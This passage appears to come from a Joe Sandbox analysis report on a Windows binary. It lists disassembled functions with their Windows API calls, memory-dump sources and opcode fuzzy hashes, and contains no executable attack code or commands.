                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                                                                                • String ID:
                                                                                                                • API String ID: 1422805418-0
                                                                                                                • Opcode ID: 9a2e8376f87e2ac466d2b8f3f02cb75f50efb59ebfdd2ca2ce2f414d150bad44
                                                                                                                • Instruction ID: 4ce0c052bf571fc092434bd52d694b5725c6704bf721cfc4ac08aa8ad7831ec2
                                                                                                                • Opcode Fuzzy Hash: 9a2e8376f87e2ac466d2b8f3f02cb75f50efb59ebfdd2ca2ce2f414d150bad44
                                                                                                                • Instruction Fuzzy Hash: F9412A71D20236ABEB119FE8F88876CF7A4BF41735F148218E429AB2D1D7749864CF91
                                                                                                                Function 0024A1B7 Relevance: 12.1, APIs: 8, Instructions: 100fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • InterlockedExchange.KERNEL32(?,000001F5), ref: 0024A1CE
                                                                                                                  • Part of subcall function 0022010A: std::exception::exception.LIBCMT ref: 0022013E
                                                                                                                  • Part of subcall function 0022010A: __CxxThrowException@8.LIBCMT ref: 00220153
                                                                                                                • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 0024A205
                                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 0024A221
                                                                                                                • _memmove.LIBCMT ref: 0024A26F
                                                                                                                • _memmove.LIBCMT ref: 0024A28C
                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 0024A29B
                                                                                                                • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 0024A2B0
                                                                                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 0024A2CF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                                                                • String ID:
                                                                                                                • API String ID: 256516436-0
                                                                                                                • Opcode ID: 9c3724b1ce89bbaf1f319b806a148a25f574a619e917c8f3617be8bc9ca42804
                                                                                                                • Instruction ID: e02b5ea57709833c5ea528a66756e630a59e5592a1fc18b9da1c9fef40f2490d
                                                                                                                • Opcode Fuzzy Hash: 9c3724b1ce89bbaf1f319b806a148a25f574a619e917c8f3617be8bc9ca42804
                                                                                                                • Instruction Fuzzy Hash: DF318431900205EBDB40EFA4EC89EAEB7B9FF45310B1480A5FD04AB296D774DD64DB61
                                                                                                                Function 00268CDB Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • DeleteObject.GDI32(00000000), ref: 00268CF3
                                                                                                                • GetDC.USER32(00000000), ref: 00268CFB
                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00268D06
                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 00268D12
                                                                                                                • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00268D4E
                                                                                                                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00268D5F
                                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0026BB29,?,?,000000FF,00000000,?,000000FF,?), ref: 00268D99
                                                                                                                • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00268DB9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3864802216-0
                                                                                                                • Opcode ID: 5fd780cf920537bf7652dae78a85cd7184ba2a5d839ef1b9d67da590eb35fa9c
                                                                                                                • Instruction ID: 8b147f54fc3c1e36a879c5b747b90c21c48887dbecdffe147a220523187f5df9
                                                                                                                • Opcode Fuzzy Hash: 5fd780cf920537bf7652dae78a85cd7184ba2a5d839ef1b9d67da590eb35fa9c
                                                                                                                • Instruction Fuzzy Hash: 78318B76201214BBEB108F61EC8AFEA3BADEF49755F044155FE08DA1D1DAB59C41CBB0
                                                                                                                Function 0021B40F Relevance: 10.7, APIs: 7, Instructions: 218COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 4e04f9add18bf3121311191f7a420905d01ce3e3febb96233a9da471f36248d4
                                                                                                                • Instruction ID: c1112b0fd9e83f4194c65433f893af22180fa499fb6fd0abf97b09c5a3de02d3
                                                                                                                • Opcode Fuzzy Hash: 4e04f9add18bf3121311191f7a420905d01ce3e3febb96233a9da471f36248d4
                                                                                                                • Instruction Fuzzy Hash: 7D715A75910109EFCB05CF98CC88AEEBBB5FF99314F14C159F915AA291C7309AA1CF60
                                                                                                                Function 00262121 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 0026214B
                                                                                                                • _memset.LIBCMT ref: 00262214
                                                                                                                • ShellExecuteExW.SHELL32(?), ref: 00262259
                                                                                                                  • Part of subcall function 002084A6: __swprintf.LIBCMT ref: 002084E5
                                                                                                                  • Part of subcall function 002084A6: __itow.LIBCMT ref: 00208519
                                                                                                                  • Part of subcall function 00203BCF: _wcscpy.LIBCMT ref: 00203BF2
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00262320
                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 0026232F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                                                                                • String ID: @
                                                                                                                • API String ID: 4082843840-2766056989
                                                                                                                • Opcode ID: baa0f40cdca20c8ef0eb2c68dcd69ed50e4daf1c215a78f13ab95198ee72838c
                                                                                                                • Instruction ID: 29cb7d00c8adc8e40a722aae855592627cac99a38382aa05b825f41cabbf01c9
                                                                                                                • Opcode Fuzzy Hash: baa0f40cdca20c8ef0eb2c68dcd69ed50e4daf1c215a78f13ab95198ee72838c
                                                                                                                • Instruction Fuzzy Hash: 99719D74A20619DFCB04EFA4C99599EB7F5FF48310F108059E849AB392DB30ADA4CF90
                                                                                                                Function 002447DE Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetParent.USER32(?), ref: 0024481D
                                                                                                                • GetKeyboardState.USER32(?), ref: 00244832
                                                                                                                • SetKeyboardState.USER32(?), ref: 00244893
                                                                                                                • PostMessageW.USER32(?,00000101,00000010,?), ref: 002448C1
                                                                                                                • PostMessageW.USER32(?,00000101,00000011,?), ref: 002448E0
                                                                                                                • PostMessageW.USER32(?,00000101,00000012,?), ref: 00244926
                                                                                                                • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00244949
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessagePost$KeyboardState$Parent
                                                                                                                • String ID:
                                                                                                                • API String ID: 87235514-0
                                                                                                                • Opcode ID: 53de61bf5ff8cb276033495ab8bcf744ac331805a3917f19334da1eff8a1a059
                                                                                                                • Instruction ID: f1a3fa739114ca89b23ddffccd1091a1bdb633b0d25243f8b6b0676817d10531
                                                                                                                • Opcode Fuzzy Hash: 53de61bf5ff8cb276033495ab8bcf744ac331805a3917f19334da1eff8a1a059
                                                                                                                • Instruction Fuzzy Hash: 5C51E7B09287D63DFB3A6B248C05BBBBF995F06304F088589E1D5564C3C6D4EDA8EB50
                                                                                                                Function 002445F9 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetParent.USER32(00000000), ref: 00244638
                                                                                                                • GetKeyboardState.USER32(?), ref: 0024464D
                                                                                                                • SetKeyboardState.USER32(?), ref: 002446AE
                                                                                                                • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 002446DA
                                                                                                                • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 002446F7
                                                                                                                • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0024473B
                                                                                                                • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0024475C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessagePost$KeyboardState$Parent
                                                                                                                • String ID:
                                                                                                                • API String ID: 87235514-0
                                                                                                                • Opcode ID: 2cbf68e7f10cd02aaafed1e62d1cd55ea6870b4dfb3ad57d945eb69a7a68aac6
                                                                                                                • Instruction ID: 87eb63e8408c2539bf118e6a084d2435844daa94df5349d24e21c5559df72d3a
                                                                                                                • Opcode Fuzzy Hash: 2cbf68e7f10cd02aaafed1e62d1cd55ea6870b4dfb3ad57d945eb69a7a68aac6
                                                                                                                • Instruction Fuzzy Hash: 805108A05247D73DFB3AAB248C45B76FF99AB07304F084489E1D55A8C2D3D4ECA9DB50
                                                                                                                Function 002486AE Relevance: 10.6, APIs: 7, Instructions: 137timeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcsncpy$LocalTime
                                                                                                                • String ID:
                                                                                                                • API String ID: 2945705084-0
                                                                                                                • Opcode ID: 402352b4582eb2b76a25f4bf5ddadde386c4eb9dd1f67d46a2aee5b465e522a0
                                                                                                                • Instruction ID: c6dec6133ce349d97d8f7014ee028ce3cf08e74e384d7758cc26ec79d72ea400
                                                                                                                • Opcode Fuzzy Hash: 402352b4582eb2b76a25f4bf5ddadde386c4eb9dd1f67d46a2aee5b465e522a0
                                                                                                                • Instruction Fuzzy Hash: 45413165C30228B5DB10EBF4D886ACFB7ACAF15310F508566E914F3131EA31E675CBA6
                                                                                                                Function 0025936F Relevance: 10.6, APIs: 7, Instructions: 136networkCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,0029DBF0), ref: 00259409
                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00259416
                                                                                                                • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 0025943A
                                                                                                                • #16.WSOCK32(?,?,00000000,00000000), ref: 00259452
                                                                                                                • _strlen.LIBCMT ref: 00259484
                                                                                                                • _memmove.LIBCMT ref: 002594CA
                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 002594F7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$_memmove_strlenselect
                                                                                                                • String ID:
                                                                                                                • API String ID: 2795762555-0
                                                                                                                • Opcode ID: b3751c580af810eb08ad3c15f29d1a67b030df74dcaff8eb31e2a9546c6baae3
                                                                                                                • Instruction ID: 3cf9da27dc3d458c412dff14732e3fb62190c411c36010ddfbd275cc79b8031b
                                                                                                                • Opcode Fuzzy Hash: b3751c580af810eb08ad3c15f29d1a67b030df74dcaff8eb31e2a9546c6baae3
                                                                                                                • Instruction Fuzzy Hash: 0C41A475510204EFCB14EF64DD85EAEB7B9EF48310F108159F916972D2DB309E65CB60
                                                                                                                Function 00269D97 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 104windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 00269DB0
                                                                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00269E57
                                                                                                                • IsMenu.USER32(?), ref: 00269E6F
                                                                                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00269EB7
                                                                                                                • DrawMenuBar.USER32 ref: 00269ED0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Menu$Item$DrawInfoInsert_memset
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 3866635326-4108050209
                                                                                                                • Opcode ID: 17d64beea56a02c06eaae697b28943cf5a78f282e8ecf9998103c35dba215879
                                                                                                                • Instruction ID: bd61b344444953d13c8fa23982566f4b0a6b451fa21977b6d1e6ac9eecd61a0c
                                                                                                                • Opcode Fuzzy Hash: 17d64beea56a02c06eaae697b28943cf5a78f282e8ecf9998103c35dba215879
                                                                                                                • Instruction Fuzzy Hash: A9412975A1020AEFDB10DF54E884E9ABBF8FF05364F04812AE90597291DB71EDA4CB50
                                                                                                                Function 00263C63 Relevance: 10.6, APIs: 7, Instructions: 100registryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00263C92
                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00263CBC
                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00263D71
                                                                                                                  • Part of subcall function 00263C63: RegCloseKey.ADVAPI32(?), ref: 00263CD9
                                                                                                                  • Part of subcall function 00263C63: FreeLibrary.KERNEL32(?), ref: 00263D2B
                                                                                                                  • Part of subcall function 00263C63: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00263D4E
                                                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00263D16
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                                                • String ID:
                                                                                                                • API String ID: 395352322-0
                                                                                                                • Opcode ID: 1e4711c5e3e153a87ccf13b311135481662a1b0b0207ffe461e621e250c90c91
                                                                                                                • Instruction ID: d5c003cf0504f30b6f0a2f08de2e0c1203fca56e829ef7a886b510d654f7b3fe
                                                                                                                • Opcode Fuzzy Hash: 1e4711c5e3e153a87ccf13b311135481662a1b0b0207ffe461e621e250c90c91
                                                                                                                • Instruction Fuzzy Hash: F1311A7592120ABFDB15DF94DC89EFEB7BCEF09300F10016AE512E2190D6709F999B60
                                                                                                                Function 00268DD5 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00268DF4
                                                                                                                • GetWindowLongW.USER32(00BCBB10,000000F0), ref: 00268E27
                                                                                                                • GetWindowLongW.USER32(00BCBB10,000000F0), ref: 00268E5C
                                                                                                                • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00268E8E
                                                                                                                • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00268EB8
                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00268EC9
                                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00268EE3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LongWindow$MessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 2178440468-0
                                                                                                                • Opcode ID: ec971262cc1d48c5a5d8be1005f6b032b4454a394a48a96deb10e528c43721b2
                                                                                                                • Instruction ID: f79adc2065909c8f1e09517247725bec774c1a7b0b855c53827797985177512a
                                                                                                                • Opcode Fuzzy Hash: ec971262cc1d48c5a5d8be1005f6b032b4454a394a48a96deb10e528c43721b2
                                                                                                                • Instruction Fuzzy Hash: A0314435654216EFEB20DF58EC89F5537E5FB4A314F1442A4F5058B2B2CB72ACA0CB40
                                                                                                                Function 002416F1 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00241734
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0024175A
                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 0024175D
                                                                                                                • SysAllocString.OLEAUT32(?), ref: 0024177B
                                                                                                                • SysFreeString.OLEAUT32(?), ref: 00241784
                                                                                                                • StringFromGUID2.OLE32(?,?,00000028), ref: 002417A9
                                                                                                                • SysAllocString.OLEAUT32(?), ref: 002417B7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                • String ID:
                                                                                                                • API String ID: 3761583154-0
                                                                                                                • Opcode ID: c16dc05a57fa3b1041d809b49dd77f396263542eb708729d0b60472f27a6fd38
                                                                                                                • Instruction ID: 1d81cc81dbbc75ac9e3923e4e103cf1442cd40acb45e0a567d2749518e74496c
                                                                                                                • Opcode Fuzzy Hash: c16dc05a57fa3b1041d809b49dd77f396263542eb708729d0b60472f27a6fd38
                                                                                                                • Instruction Fuzzy Hash: 6921A479611219AF9B14AFA8DC88DBFB3ECEB09374B408125F905DB291D770EC958B60
                                                                                                                Function 002469F9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 93filestringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 002031B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 002031DA
                                                                                                                • lstrcmpiW.KERNEL32(?,?), ref: 00246A2B
                                                                                                                • _wcscmp.LIBCMT ref: 00246A49
                                                                                                                • MoveFileW.KERNEL32(?,?), ref: 00246A62
                                                                                                                  • Part of subcall function 00246D6D: GetFileAttributesW.KERNEL32(?,?,00000000), ref: 00246DBA
                                                                                                                  • Part of subcall function 00246D6D: GetLastError.KERNEL32 ref: 00246DC5
                                                                                                                  • Part of subcall function 00246D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 00246DD9
                                                                                                                • _wcscat.LIBCMT ref: 00246AA4
                                                                                                                • SHFileOperationW.SHELL32(?), ref: 00246B0C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$AttributesCreateDirectoryErrorFullLastMoveNameOperationPath_wcscat_wcscmplstrcmpi
                                                                                                                • String ID: \*.*
                                                                                                                • API String ID: 2323102230-1173974218
                                                                                                                • Opcode ID: c27f1cc162311908539c3769da665e52bd5369169d04b6f68adb31360a628fe0
